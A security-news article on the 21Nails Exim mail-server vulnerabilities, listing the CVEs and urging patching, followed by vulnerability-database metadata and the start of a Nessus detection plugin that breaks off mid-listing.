ALERT — New 21Nails Exim Bugs Expose Millions of Email Servers to Hacking

2021-05-05T07:56:00

Description

[![](https://thehackernews.com/images/-_lOSLCJhB5s/YJJNzo-YIzI/AAAAAAAACdM/DOe_4kGUvcI1Oj8LYiE1-uzhqRyIH5zwQCLcBGAsYHQ/s0/exim.jpg)](<https://thehackernews.com/images/-_lOSLCJhB5s/YJJNzo-YIzI/AAAAAAAACdM/DOe_4kGUvcI1Oj8LYiE1-uzhqRyIH5zwQCLcBGAsYHQ/s0/exim.jpg>) The maintainers of Exim have [released patches](<https://www.openwall.com/lists/oss-security/2021/05/04/6>) to remediate as many as 21 security vulnerabilities in its software that could enable unauthenticated attackers to achieve complete remote code execution and gain root privileges. Collectively named ['21Nails](<https://blog.qualys.com/vulnerabilities-research/2021/05/04/21nails-multiple-vulnerabilities-in-exim-mail-server>),' the flaws include 11 vulnerabilities that require local access to the server and 10 other weaknesses that could be exploited remotely. The issues were discovered by Qualys and reported to Exim on Oct. 20, 2020. "Some of the vulnerabilities can be chained together to obtain a full remote unauthenticated code execution and gain root privileges on the Exim Server," Bharat Jogi, senior manager at Qualys, said in a public disclosure. "Most of the vulnerabilities discovered by the Qualys Research Team for e.g. CVE-2020-28017 affects all versions of Exim going back all the way to 2004." Exim is a popular mail transfer agent (MTA) used on Unix-like operating systems, with over [60% of the publicly reachable mail servers](<https://www.securityspace.com/s_survey/data/man.202102/mxsurvey.html>) on the Internet running the software. A Shodan search reveals nearly four million Exim servers that are exposed online. [Exim Mail Server Multiple Vulnerabilities (21Nails)](<https://vimeo.com/544783362>) from [Qualys, Inc.](<https://vimeo.com/qualys>) on [Vimeo](<https://vimeo.com>). A quick summary of the [21 bugs](<https://www.exim.org/static/doc/security/CVE-2020-qualys/>) is listed below. If successfully exploited, they could be used to tweak email settings and even add new accounts on the compromised mail servers. Technical specifics about the flaws can be accessed [here](<https://www.qualys.com/2021/05/04/21nails/21nails.txt>). Local vulnerabilities: * CVE-2020-28007: Link attack in Exim's log directory * CVE-2020-28008: Assorted attacks in Exim's spool directory * CVE-2020-28014: Arbitrary file creation and clobbering * CVE-2021-27216: Arbitrary file deletion * CVE-2020-28011: Heap buffer overflow in queue_run() * CVE-2020-28010: Heap out-of-bounds write in main() * CVE-2020-28013: Heap buffer overflow in parse_fix_phrase() * CVE-2020-28016: Heap out-of-bounds write in parse_fix_phrase() * CVE-2020-28015: New-line injection into spool header file (local) * CVE-2020-28012: Missing close-on-exec flag for privileged pipe * CVE-2020-28009: Integer overflow in get_stdinput() Remote vulnerabilities: * CVE-2020-28017: Integer overflow in receive_add_recipient() * CVE-2020-28020: Integer overflow in receive_msg() * CVE-2020-28023: Out-of-bounds read in smtp_setup_msg() * CVE-2020-28021: New-line injection into spool header file (remote) * CVE-2020-28022: Heap out-of-bounds read and write in extract_option() * CVE-2020-28026: Line truncation and injection in spool_read_header() * CVE-2020-28019: Failure to reset function pointer after BDAT error * CVE-2020-28024: Heap buffer underflow in smtp_ungetc() * CVE-2020-28018: Use-after-free in tls-openssl.c * CVE-2020-28025: Heap out-of-bounds read in pdkim_finish_bodyhash() In light of the recent [Microsoft Exchange server hacks](<https://thehackernews.com/2021/03/microsoft-exchange-cyber-attack-what-do.html>), it's imperative the patches are applied immediately, as email servers have emerged as a lucrative target for espionage campaigns. In the past, flaws in Exim software have been actively exploited by bad actors to mount a variety of attacks, including deploying a [Linux worm](<https://www.cybereason.com/blog/new-pervasive-worm-exploiting-linux-exim-server-vulnerability>) to install cryptocurrency miners on affected servers. Last May, the U.S. National Security Agency (NSA) warned that Russian military operatives, publicly known as Sandworm Team, were taking advantage of a remote code execution vulnerability tracked as [CVE-2019-10149](<https://thehackernews.com/2019/09/exim-email-security-vulnerability.html>) (aka [The Return of the WIZard](<https://www.qualys.com/2019/06/05/cve-2019-10149/return-wizard-rce-exim.txt>)) to "add privileged users, disable network security settings, execute additional scripts for further network exploitation" at least since August 2019. [![](https://thehackernews.com/images/-LTCI-TYDDyI/YJJM-dak08I/AAAAAAAACdE/R23xKpIkqSk-VHNKuDAmNYBV7PljRigJwCLcBGAsYHQ/s0/exim.jpg)](<https://thehackernews.com/images/-LTCI-TYDDyI/YJJM-dak08I/AAAAAAAACdE/R23xKpIkqSk-VHNKuDAmNYBV7PljRigJwCLcBGAsYHQ/s0/exim.jpg>) The NSA [called](<https://www.nsa.gov/News-Features/Feature-Stories/Article-View/Article/2196511/exim-mail-transfer-agent-actively-exploited-by-russian-gru-cyber-actors/>) it an "attacker's dream access." "Mail Transfer Agents are interesting targets for attackers because they are usually accessible over the internet," Jogi said. "Once exploited, they could modify sensitive email settings on the mail servers, allow adversaries to create new accounts on the target mail servers." Found this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter __](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.

{"id": "THN:4187F343BF8C013343AFB7593528F26B", "vendorId": null, "type": "thn", "bulletinFamily": "info", "title": "ALERT \u2014 New 21Nails Exim Bugs Expose Millions of Email Servers to Hacking", "description": "[![](https://thehackernews.com/images/-_lOSLCJhB5s/YJJNzo-YIzI/AAAAAAAACdM/DOe_4kGUvcI1Oj8LYiE1-uzhqRyIH5zwQCLcBGAsYHQ/s0/exim.jpg)](<https://thehackernews.com/images/-_lOSLCJhB5s/YJJNzo-YIzI/AAAAAAAACdM/DOe_4kGUvcI1Oj8LYiE1-uzhqRyIH5zwQCLcBGAsYHQ/s0/exim.jpg>)\n\nThe maintainers of Exim have [released patches](<https://www.openwall.com/lists/oss-security/2021/05/04/6>) to remediate as many as 21 security vulnerabilities in its software that could enable unauthenticated attackers to achieve complete remote code execution and gain root privileges.\n\nCollectively named ['21Nails](<https://blog.qualys.com/vulnerabilities-research/2021/05/04/21nails-multiple-vulnerabilities-in-exim-mail-server>),' the flaws include 11 vulnerabilities that require local access to the server and 10 other weaknesses that could be exploited remotely. The issues were discovered by Qualys and reported to Exim on Oct. 20, 2020.\n\n\"Some of the vulnerabilities can be chained together to obtain a full remote unauthenticated code execution and gain root privileges on the Exim Server,\" Bharat Jogi, senior manager at Qualys, said in a public disclosure. \"Most of the vulnerabilities discovered by the Qualys Research Team for e.g. CVE-2020-28017 affects all versions of Exim going back all the way to 2004.\"\n\nExim is a popular mail transfer agent (MTA) used on Unix-like operating systems, with over [60% of the publicly reachable mail servers](<https://www.securityspace.com/s_survey/data/man.202102/mxsurvey.html>) on the Internet running the software. A Shodan search reveals nearly four million Exim servers that are exposed online.\n\n[Exim Mail Server Multiple Vulnerabilities (21Nails)](<https://vimeo.com/544783362>) from [Qualys, Inc.](<https://vimeo.com/qualys>) on [Vimeo](<https://vimeo.com>).\n\nA quick summary of the [21 bugs](<https://www.exim.org/static/doc/security/CVE-2020-qualys/>) is listed below. If successfully exploited, they could be used to tweak email settings and even add new accounts on the compromised mail servers. Technical specifics about the flaws can be accessed [here](<https://www.qualys.com/2021/05/04/21nails/21nails.txt>).\n\nLocal vulnerabilities:\n\n * CVE-2020-28007: Link attack in Exim's log directory\n * CVE-2020-28008: Assorted attacks in Exim's spool directory\n * CVE-2020-28014: Arbitrary file creation and clobbering\n * CVE-2021-27216: Arbitrary file deletion\n * CVE-2020-28011: Heap buffer overflow in queue_run()\n * CVE-2020-28010: Heap out-of-bounds write in main()\n * CVE-2020-28013: Heap buffer overflow in parse_fix_phrase()\n * CVE-2020-28016: Heap out-of-bounds write in parse_fix_phrase()\n * CVE-2020-28015: New-line injection into spool header file (local)\n * CVE-2020-28012: Missing close-on-exec flag for privileged pipe\n * CVE-2020-28009: Integer overflow in get_stdinput()\n\nRemote vulnerabilities:\n\n * CVE-2020-28017: Integer overflow in receive_add_recipient()\n * CVE-2020-28020: Integer overflow in receive_msg()\n * CVE-2020-28023: Out-of-bounds read in smtp_setup_msg()\n * CVE-2020-28021: New-line injection into spool header file (remote)\n * CVE-2020-28022: Heap out-of-bounds read and write in extract_option()\n * CVE-2020-28026: Line truncation and injection in spool_read_header()\n * CVE-2020-28019: Failure to reset function pointer after BDAT error\n * CVE-2020-28024: Heap buffer underflow in smtp_ungetc()\n * CVE-2020-28018: Use-after-free in tls-openssl.c\n * CVE-2020-28025: Heap out-of-bounds read in pdkim_finish_bodyhash()\n\nIn light of the recent [Microsoft Exchange server hacks](<https://thehackernews.com/2021/03/microsoft-exchange-cyber-attack-what-do.html>), it's imperative the patches are applied immediately, as email servers have emerged as a lucrative target for espionage campaigns. In the past, flaws in Exim software have been actively exploited by bad actors to mount a variety of attacks, including deploying a [Linux worm](<https://www.cybereason.com/blog/new-pervasive-worm-exploiting-linux-exim-server-vulnerability>) to install cryptocurrency miners on affected servers.\n\nLast May, the U.S. National Security Agency (NSA) warned that Russian military operatives, publicly known as Sandworm Team, were taking advantage of a remote code execution vulnerability tracked as [CVE-2019-10149](<https://thehackernews.com/2019/09/exim-email-security-vulnerability.html>) (aka [The Return of the WIZard](<https://www.qualys.com/2019/06/05/cve-2019-10149/return-wizard-rce-exim.txt>)) to \"add privileged users, disable network security settings, execute additional scripts for further network exploitation\" at least since August 2019.\n\n[![](https://thehackernews.com/images/-LTCI-TYDDyI/YJJM-dak08I/AAAAAAAACdE/R23xKpIkqSk-VHNKuDAmNYBV7PljRigJwCLcBGAsYHQ/s0/exim.jpg)](<https://thehackernews.com/images/-LTCI-TYDDyI/YJJM-dak08I/AAAAAAAACdE/R23xKpIkqSk-VHNKuDAmNYBV7PljRigJwCLcBGAsYHQ/s0/exim.jpg>)\n\nThe NSA [called](<https://www.nsa.gov/News-Features/Feature-Stories/Article-View/Article/2196511/exim-mail-transfer-agent-actively-exploited-by-russian-gru-cyber-actors/>) it an \"attacker's dream access.\"\n\n\"Mail Transfer Agents are interesting targets for attackers because they are usually accessible over the internet,\" Jogi said. \"Once exploited, they could modify sensitive email settings on the mail servers, allow adversaries to create new accounts on the target mail servers.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "published": "2021-05-05T07:56:00", "modified": "2021-05-08T11:47:45", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 10.0}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://thehackernews.com/2021/05/alert-new-21nails-exim-bugs-expose.html", "reporter": "The Hacker News", "references": [], "cvelist": ["CVE-2019-10149", "CVE-2020-28007", "CVE-2020-28008", "CVE-2020-28009", "CVE-2020-28010", "CVE-2020-28011", "CVE-2020-28012", "CVE-2020-28013", "CVE-2020-28014", "CVE-2020-28015", "CVE-2020-28016", "CVE-2020-28017", "CVE-2020-28018", "CVE-2020-28019", "CVE-2020-28020", "CVE-2020-28021", "CVE-2020-28022", "CVE-2020-28023", "CVE-2020-28024", "CVE-2020-28025", "CVE-2020-28026", "CVE-2021-27216"], "immutableFields": [], "lastseen": "2022-05-09T12:38:16", "viewCount": 123, "enchantments": {"dependencies": {"references": [{"type": "alpinelinux", "idList": ["ALPINE:CVE-2020-28017"]}, {"type": "amazon", "idList": ["ALAS-2019-1221", "ALAS-2021-1497", "ALAS-2022-1622"]}, {"type": "attackerkb", "idList": ["AKB:C9297F4A-1863-4574-885A-36C840DFF834", "AKB:CCDE85CB-574C-401B-9892-9CAFDE0D120B", "AKB:D6CD45B9-F610-4480-99E7-80A4065DF5FD"]}, {"type": "canvas", "idList": ["EXIM_EXPANSION_RCE"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2019-0743", "CPAI-2020-3455"]}, {"type": "cisa", "idList": ["CISA:0112C06A4ED522FC96CC36F94A083A95", "CISA:8012376262FFBCAA3DBEE889B5EE4625", "CISA:99DAB57F9B8063F8619B1A418B014DF1"]}, {"type": "cve", "idList": ["CVE-2019-10149", "CVE-2020-28007", "CVE-2020-28008", "CVE-2020-28009", "CVE-2020-28010", "CVE-2020-28011", "CVE-2020-28012", "CVE-2020-28013", "CVE-2020-28014", "CVE-2020-28015", "CVE-2020-28016", "CVE-2020-28017", "CVE-2020-28018", "CVE-2020-28019", "CVE-2020-28020", "CVE-2020-28021", "CVE-2020-28022", "CVE-2020-28023", "CVE-2020-28024", "CVE-2020-28025", "CVE-2020-28026", "CVE-2021-27216"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2650-1:EE0B1", "DEBIAN:DSA-4456-1:5D64B", "DEBIAN:DSA-4456-1:D32A2", "DEBIAN:DSA-4912-1:A1054", "DEBIAN:DSA-4912-1:AC8C7"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2019-10149", "DEBIANCVE:CVE-2020-28007", "DEBIANCVE:CVE-2020-28008", "DEBIANCVE:CVE-2020-28009", "DEBIANCVE:CVE-2020-28010", "DEBIANCVE:CVE-2020-28011", "DEBIANCVE:CVE-2020-28012", "DEBIANCVE:CVE-2020-28013", "DEBIANCVE:CVE-2020-28014", "DEBIANCVE:CVE-2020-28015", "DEBIANCVE:CVE-2020-28016", "DEBIANCVE:CVE-2020-28017", "DEBIANCVE:CVE-2020-28018", "DEBIANCVE:CVE-2020-28019", "DEBIANCVE:CVE-2020-28020", "DEBIANCVE:CVE-2020-28021", "DEBIANCVE:CVE-2020-28022", "DEBIANCVE:CVE-2020-28023", "DEBIANCVE:CVE-2020-28024", "DEBIANCVE:CVE-2020-28025", "DEBIANCVE:CVE-2020-28026", "DEBIANCVE:CVE-2021-27216"]}, {"type": "exploitdb", "idList": ["EDB-ID:46974", "EDB-ID:46996", "EDB-ID:47307"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:4FFD4258EB9240F56C83A57C965E0913", "EXPLOITPACK:5F07E65256D3B05FE6074E80F7346498"]}, {"type": "freebsd", "idList": ["45BEA6B5-8855-11E9-8D41-97657151F8C2"]}, {"type": "gentoo", "idList": ["GLSA-201906-01", "GLSA-202105-01"]}, {"type": "githubexploit", "idList": ["314FBFEA-2B26-54C6-BD8B-833438155879", "347B3764-E644-581E-AFCB-F57D6EDDDA1E", "53BB099A-E497-5170-9B4B-16FB5A78CF67", "7B7215E0-65A8-5ECC-B222-5204D0DE0ABF", "7DB4D6C1-099F-581F-8C39-DB454925C570", "ADA0DDA5-BF6D-5656-87DA-B9E2BF0777ED", "D4A90249-DD8A-53F0-BF5C-2A24402535BB", "E1FEC345-BB7E-5FFE-AD78-64A1B9E93172"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-LINUX-LOCAL-EXIM4_DELIVER_MESSAGE_PRIV_ESC-"]}, {"type": "msrc", "idList": ["MSRC:31C9A6AB6048DC2F0939A862156094A7", "MSRC:388A48CE67D2E58B0FB4372836DA1089"]}, {"type": "myhack58", "idList": ["MYHACK58:62201994514"]}, {"type": "nessus", "idList": ["700728.PRM", "ALA_ALAS-2019-1221.NASL", "ALA_ALAS-2021-1497.NASL", "ALA_ALAS-2022-1622.NASL", "DEBIAN_DLA-2650.NASL", "DEBIAN_DSA-4456.NASL", "DEBIAN_DSA-4912.NASL", "EXIM_4_92.NASL", "EXIM_4_94_2.NASL", "EXIM_DELIVER_MESSAGE_CMD_EXEC.NBIN", "FREEBSD_PKG_45BEA6B5885511E98D4197657151F8C2.NASL", "GENTOO_GLSA-201906-01.NASL", "GENTOO_GLSA-202105-01.NASL", "OPENSUSE-2019-1524.NASL", "OPENSUSE-2021-677.NASL", "UBUNTU_USN-4010-1.NASL", "UBUNTU_USN-4934-1.NASL", "UBUNTU_USN-4934-2.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310140090", "OPENVAS:1361412562310704456", "OPENVAS:1361412562310844043", "OPENVAS:1361412562310852550"]}, {"type": "osv", "idList": ["OSV:DLA-2650-1", "OSV:DSA-4456-1", "OSV:DSA-4912-1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:153312", "PACKETSTORM:154198"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:01C65083E501A6BAFB08FCDA1D561012", "QUALYSBLOG:1B84DE2D33648D7FDD0B08B1CC1F1AD8", "QUALYSBLOG:4670C5BC6972C137122A7C820F9793F0", "QUALYSBLOG:DE1FEC2B9B661D42DAA0BA398DBFD24E", "QUALYSBLOG:EE3A76FB5EA09543FF235E8362A83373"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:F3A304F4033DF3E6F81CCD52475053BD"]}, {"type": "redhatcve", "idList": ["RH:CVE-2019-10149"]}, {"type": "securelist", "idList": ["SECURELIST:78FB952921DD97BAF55DA33811CB6FE4", "SECURELIST:91CACDF02C22F17E70A0DC58D036F9DE"]}, {"type": "seebug", "idList": ["SSV:99253"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:1524-1", "OPENSUSE-SU-2021:0677-1", "OPENSUSE-SU-2021:0753-1", "OPENSUSE-SU-2021:0754-1"]}, {"type": "thn", "idList": ["THN:3E9680853FA3A677106A8ED8B7AACBE6", "THN:66694DD5D9C12B2B7881AB6C960E34DC", "THN:A947D0153E6D676ABBCCAB69CD1E73DB", "THN:FF07DE65AF5F03EDE8E6AF8F1D180CA1"]}, {"type": "threatpost", "idList": ["THREATPOST:130EDA07603C228BE562B445904A297A", "THREATPOST:1E8692DD3729CF2A8B526A85F076513F", "THREATPOST:406129F1455008D4B9A55FF40B09CCAF", "THREATPOST:63DD69067ED6D0F017DBA81FF1A56760", "THREATPOST:97FDAC2A1EE34161937EEA7D58123D3D"]}, {"type": "ubuntu", "idList": ["USN-4010-1", "USN-4934-1", "USN-4934-2"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2019-10149", "UB:CVE-2020-28007", "UB:CVE-2020-28008", "UB:CVE-2020-28009", "UB:CVE-2020-28010", "UB:CVE-2020-28011", "UB:CVE-2020-28012", "UB:CVE-2020-28013", "UB:CVE-2020-28014", "UB:CVE-2020-28015", "UB:CVE-2020-28016", "UB:CVE-2020-28017", "UB:CVE-2020-28018", "UB:CVE-2020-28019", "UB:CVE-2020-28020", "UB:CVE-2020-28021", "UB:CVE-2020-28022", "UB:CVE-2020-28023", "UB:CVE-2020-28024", "UB:CVE-2020-28025", "UB:CVE-2020-28026", "UB:CVE-2021-27216"]}, {"type": "veracode", "idList": ["VERACODE:30331", "VERACODE:30332", "VERACODE:30333", "VERACODE:30334", "VERACODE:30335", "VERACODE:30336", "VERACODE:30337", "VERACODE:30338", "VERACODE:30339", "VERACODE:30340", "VERACODE:30341", "VERACODE:30342", "VERACODE:30343", "VERACODE:30344", "VERACODE:30345", "VERACODE:30346", "VERACODE:30347", "VERACODE:30368", "VERACODE:30369", "VERACODE:30370", "VERACODE:30373"]}, {"type": "zdt", "idList": ["1337DAY-ID-32848", "1337DAY-ID-32869", "1337DAY-ID-33150"]}]}, "score": {"value": 1.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "amazon", "idList": ["ALAS-2019-1221"]}, {"type": "attackerkb", "idList": ["AKB:D6CD45B9-F610-4480-99E7-80A4065DF5FD"]}, {"type": "canvas", "idList": ["EXIM_EXPANSION_RCE"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2019-0743"]}, {"type": "cisa", "idList": ["CISA:0112C06A4ED522FC96CC36F94A083A95", "CISA:8012376262FFBCAA3DBEE889B5EE4625"]}, {"type": "cve", "idList": ["CVE-2019-10149"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4456-1:5D64B"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2019-10149", "DEBIANCVE:CVE-2020-28007", "DEBIANCVE:CVE-2020-28008", "DEBIANCVE:CVE-2020-28009", "DEBIANCVE:CVE-2020-28010", "DEBIANCVE:CVE-2020-28011", "DEBIANCVE:CVE-2020-28012", "DEBIANCVE:CVE-2020-28013", "DEBIANCVE:CVE-2020-28014", "DEBIANCVE:CVE-2020-28015", "DEBIANCVE:CVE-2020-28016", "DEBIANCVE:CVE-2020-28017", "DEBIANCVE:CVE-2020-28018", "DEBIANCVE:CVE-2020-28019", "DEBIANCVE:CVE-2020-28020", "DEBIANCVE:CVE-2020-28021", "DEBIANCVE:CVE-2020-28022", "DEBIANCVE:CVE-2020-28023", "DEBIANCVE:CVE-2020-28024", "DEBIANCVE:CVE-2020-28025", "DEBIANCVE:CVE-2020-28026", "DEBIANCVE:CVE-2021-27216"]}, {"type": "exploitdb", "idList": ["EDB-ID:46996", "EDB-ID:47307"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:5F07E65256D3B05FE6074E80F7346498"]}, {"type": "freebsd", "idList": ["45BEA6B5-8855-11E9-8D41-97657151F8C2"]}, {"type": "gentoo", "idList": ["GLSA-201906-01"]}, {"type": "githubexploit", "idList": ["314FBFEA-2B26-54C6-BD8B-833438155879", "347B3764-E644-581E-AFCB-F57D6EDDDA1E", "53BB099A-E497-5170-9B4B-16FB5A78CF67", "7B7215E0-65A8-5ECC-B222-5204D0DE0ABF", "7DB4D6C1-099F-581F-8C39-DB454925C570", "ADA0DDA5-BF6D-5656-87DA-B9E2BF0777ED", "D4A90249-DD8A-53F0-BF5C-2A24402535BB", "E1FEC345-BB7E-5FFE-AD78-64A1B9E93172"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/LINUX/LOCAL/EXIM4_DELIVER_MESSAGE_PRIV_ESC"]}, {"type": "msrc", "idList": ["MSRC:388A48CE67D2E58B0FB4372836DA1089"]}, {"type": "myhack58", "idList": ["MYHACK58:62201994514"]}, {"type": "nessus", "idList": ["ALA_ALAS-2019-1221.NASL", "DEBIAN_DSA-4456.NASL", "EXIM_4_92.NASL", "FREEBSD_PKG_45BEA6B5885511E98D4197657151F8C2.NASL", "GENTOO_GLSA-201906-01.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310140090", "OPENVAS:1361412562310704456", "OPENVAS:1361412562310844043", "OPENVAS:1361412562310852550"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:153312", "PACKETSTORM:154198"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:EE3A76FB5EA09543FF235E8362A83373"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:F3A304F4033DF3E6F81CCD52475053BD"]}, {"type": "redhatcve", "idList": ["RH:CVE-2019-10149"]}, {"type": "securelist", "idList": ["SECURELIST:78FB952921DD97BAF55DA33811CB6FE4"]}, {"type": "seebug", "idList": ["SSV:99253"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:1524-1"]}, {"type": "thn", "idList": ["THN:FF07DE65AF5F03EDE8E6AF8F1D180CA1"]}, {"type": "threatpost", "idList": ["THREATPOST:406129F1455008D4B9A55FF40B09CCAF", "THREATPOST:97FDAC2A1EE34161937EEA7D58123D3D"]}, {"type": "ubuntu", "idList": ["USN-4010-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2020-28007", "UB:CVE-2020-28008", "UB:CVE-2020-28010", "UB:CVE-2020-28011", "UB:CVE-2020-28012", "UB:CVE-2020-28015", "UB:CVE-2020-28016", "UB:CVE-2020-28017", "UB:CVE-2020-28018", "UB:CVE-2020-28019", "UB:CVE-2020-28020", "UB:CVE-2020-28021", "UB:CVE-2020-28023", "UB:CVE-2020-28024", "UB:CVE-2020-28025", "UB:CVE-2020-28026", "UB:CVE-2021-27216"]}, {"type": "zdt", "idList": ["1337DAY-ID-32869", "1337DAY-ID-33150"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2019-10149", "epss": "0.975110000", "percentile": "0.999640000", "modified": "2023-03-16"}, {"cve": "CVE-2020-28007", "epss": "0.000440000", "percentile": "0.102230000", "modified": "2023-03-17"}, {"cve": "CVE-2020-28008", "epss": "0.000440000", "percentile": "0.102230000", "modified": "2023-03-17"}, {"cve": "CVE-2020-28009", "epss": "0.000450000", "percentile": "0.120250000", "modified": "2023-03-17"}, {"cve": "CVE-2020-28010", "epss": "0.000440000", "percentile": "0.102230000", "modified": "2023-03-17"}, {"cve": "CVE-2020-28011", "epss": "0.000440000", "percentile": "0.102230000", "modified": "2023-03-17"}, {"cve": "CVE-2020-28012", "epss": "0.000440000", "percentile": "0.102230000", "modified": "2023-03-17"}, {"cve": "CVE-2020-28013", "epss": "0.000440000", "percentile": "0.102230000", "modified": "2023-03-17"}, {"cve": "CVE-2020-28014", "epss": "0.000440000", "percentile": "0.102230000", "modified": "2023-03-17"}, {"cve": "CVE-2020-28015", "epss": "0.000420000", "percentile": "0.056410000", "modified": "2023-03-17"}, {"cve": "CVE-2020-28016", "epss": "0.000440000", "percentile": "0.102230000", "modified": "2023-03-17"}, {"cve": "CVE-2020-28017", "epss": "0.002260000", "percentile": "0.590920000", "modified": "2023-03-17"}, {"cve": "CVE-2020-28018", "epss": "0.022240000", "percentile": "0.877450000", "modified": "2023-03-17"}, {"cve": "CVE-2020-28019", "epss": "0.101570000", "percentile": "0.939770000", "modified": "2023-03-17"}, {"cve": "CVE-2020-28020", "epss": "0.017620000", "percentile": "0.860590000", "modified": "2023-03-17"}, {"cve": "CVE-2020-28021", "epss": "0.002060000", "percentile": "0.568670000", "modified": "2023-03-17"}, {"cve": "CVE-2020-28022", "epss": "0.002010000", "percentile": "0.563070000", "modified": "2023-03-17"}, {"cve": "CVE-2020-28023", "epss": "0.001540000", "percentile": "0.499950000", "modified": "2023-03-17"}, {"cve": "CVE-2020-28024", "epss": "0.003690000", "percentile": "0.682800000", "modified": "2023-03-17"}, {"cve": "CVE-2020-28025", "epss": "0.001540000", "percentile": "0.499950000", "modified": "2023-03-17"}, {"cve": "CVE-2020-28026", "epss": "0.002080000", "percentile": "0.569810000", "modified": "2023-03-17"}, {"cve": "CVE-2021-27216", "epss": "0.000420000", "percentile": "0.056410000", "modified": "2023-03-17"}], "vulnersScore": 1.2}, "_state": {"dependencies": 1660004461, "score": 1684007085, "epss": 1679070268}, "_internal": {"score_hash": "48e71863a8c237528dd49b13e6578476"}}

{"nessus": [{"lastseen": "2023-09-19T15:14:28", "description": "The remote Ubuntu 18.04 LTS / 20.04 LTS / 20.10 / 21.04 host has packages installed that are affected by multiple vulnerabilities as referenced in the USN-4934-1 advisory. Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-05-04T00:00:00", "type": "nessus", "title": "Ubuntu 18.04 LTS / 20.04 LTS / 20.10 / 21.04 : Exim vulnerabilities (USN-4934-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-28007", "CVE-2020-28008", "CVE-2020-28009", "CVE-2020-28010", "CVE-2020-28011", "CVE-2020-28012", "CVE-2020-28013", "CVE-2020-28014", "CVE-2020-28015", "CVE-2020-28016", "CVE-2020-28017", "CVE-2020-28018", "CVE-2020-28019", "CVE-2020-28020", "CVE-2020-28021", "CVE-2020-28022", "CVE-2020-28023", "CVE-2020-28024", "CVE-2020-28025", "CVE-2020-28026", "CVE-2021-27216"], "modified": "2023-01-17T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:18.04:-:lts", "cpe:/o:canonical:ubuntu_linux:20.04:-:lts", "cpe:/o:canonical:ubuntu_linux:20.10", "cpe:/o:canonical:ubuntu_linux:21.04", "p-cpe:/a:canonical:ubuntu_linux:exim4", "p-cpe:/a:canonical:ubuntu_linux:exim4-base", "p-cpe:/a:canonical:ubuntu_linux:exim4-config", "p-cpe:/a:canonical:ubuntu_linux:exim4-daemon-heavy", "p-cpe:/a:canonical:ubuntu_linux:exim4-daemon-light", "p-cpe:/a:canonical:ubuntu_linux:exim4-dev", "p-cpe:/a:canonical:ubuntu_linux:eximon4"], "id": "UBUNTU_USN-4934-1.NASL", "href": "https://www.tenable.com/plugins/nessus/149253", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-4934-1. The text\n# itself is copyright (C) Canonical, Inc. See\n# <https://ubuntu.com/security/notices>. Ubuntu(R) is a registered\n# trademark of Canonical, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(149253);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/17\");\n\n script_cve_id(\n \"CVE-2020-28007\",\n \"CVE-2020-28008\",\n \"CVE-2020-28009\",\n \"CVE-2020-28010\",\n \"CVE-2020-28011\",\n \"CVE-2020-28012\",\n \"CVE-2020-28013\",\n \"CVE-2020-28014\",\n \"CVE-2020-28015\",\n \"CVE-2020-28016\",\n \"CVE-2020-28017\",\n \"CVE-2020-28018\",\n \"CVE-2020-28019\",\n \"CVE-2020-28020\",\n \"CVE-2020-28021\",\n \"CVE-2020-28022\",\n 